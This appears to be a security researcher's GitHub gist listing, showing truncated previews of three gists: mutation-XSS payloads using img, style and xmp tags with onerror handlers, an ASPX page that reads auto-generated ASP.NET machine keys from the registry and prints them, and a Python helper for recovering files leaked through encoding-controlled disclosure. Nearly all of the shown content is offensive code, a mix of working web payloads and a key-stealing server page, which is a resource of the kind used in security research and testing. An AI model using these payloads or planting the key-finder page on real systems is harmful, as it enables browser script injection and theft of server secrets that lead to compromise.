Soroush Dalili irsdl

💭

< ⊙ ͜ʖಠ />

irsdl / mXSS

Last active October 25, 2024 03:41

some mXSS samples

	<img alt="<x" title="/><img src=url404 onerror=xss(0)>">

	<img alt="
	<x" title="/>
	<img src=url404 onerror=xss(1)>">

	<style><style/><img src=url404 onerror=xss(2)>

	<xmp><xmp/><img src=url404 onerror=xss(3)>

irsdl / machineKeyFinder.aspx

Last active August 5, 2025 15:11

To find validation and decryption keys when AutoGenerate has been used in Machine Key settings

	<%@ Page Language="C#" %>
	<%
	// Read https://soroush.secproject.com/blog/2019/05/danger-of-stealing-auto-generated-net-machine-keys/
	Response.Write("<br/><hr/>");
	byte[] autoGenKeyV4 = (byte[]) Microsoft.Win32.Registry.GetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\ASP.NET\\4.0.30319.0\\", "AutoGenKeyV4", new byte[]{});
	if(autoGenKeyV4!=null)
	Response.Write("HKCU\\Software\\Microsoft\\ASP.NET\\4.0.30319.0\\AutoGenKeyV4: "+BitConverter.ToString(autoGenKeyV4).Replace("-", string.Empty));
	Response.Write("<br/>");
	byte[] autoGenKey = (byte[]) Microsoft.Win32.Registry.GetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\ASP.NET\\2.0.50727.0\\", "AutoGenKey", new byte[]{});
	if(autoGenKey!=null)

irsdl / iso-8859-1_to_binary.py

Last active March 19, 2018 10:16

Convert from iso-8859-1 to binary

	# Convert from iso-8859-1, utf-8ed to binary!
	# Useful for file disclosure when encoding can be controlled
	# The following C# code shows an example (result is iso-8859-1, utf-8ed!):
	###string encoding = "iso-8859-1";
	######string sourceFile = @"Newtonsoft.Json.dll";
	######
	######public void test()
	######{
	#########System.Text.Encoding myEncoding = Encoding.GetEncoding(encoding);
	#########String sourceFilePath = Directory.GetCurrentDirectory() + @"\" + sourceFile;